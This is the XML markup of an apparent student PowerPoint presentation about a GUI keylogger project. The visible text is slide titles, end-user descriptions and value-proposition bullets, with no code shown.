              <a:t>: Security professionals might use this tool to study keystroke patterns or to understand how keyloggers work, potentially developing counter measures against malicious keylogging.</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4. IT Administrators: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Troubleshooting: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IT Administrators could use this to troubleshoot issues with keyboards or to monitor specific actions taken on a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">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325"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 y="190501"/>
            <a:ext cx="10286999" cy="1244571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</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25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LU</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-345" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="60" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-295" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-35" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" spc="25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>R</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15" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>P</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25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962399" y="1676400"/>
            <a:ext cx="5572125" cy="1752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lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      The provided code offers a simple yet functional keylogger application with a graphical user interface (GUI).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Single Corner Rounded 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3962400"/>
            <a:ext cx="4191000" cy="2505075"/>
          </a:xfrm>
          <a:prstGeom prst="round1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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Value Proposition:</a:t>
            </a:r>
          </a:p>
          <a:p>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1.Ease of Use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>       2.Versatile Data Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>       3.Educational Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>       4.Monitoring and Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>       5.Extensibility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2022</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>218</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vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PROJECT TITLE</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>What is Keylogger and Security?</vt:lpstr>
      <vt:lpstr>Types of Keyloggers:</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PROJECT OVERVIEW:</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr> SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>THE WOW IN OUR SOLUTION</vt:lpstr>
      <vt:lpstr>Required libraries for implementing keylogger code </vt:lpstr>
      <vt:lpstr>Code Implementation : </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 UDAY KIRAN</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-20T12:13:04Z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4D8A2309537449A8811B13EDE4E9CF2E_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.2.0.17119</vt:lpwstr>
  </property>
</Properties>
</file>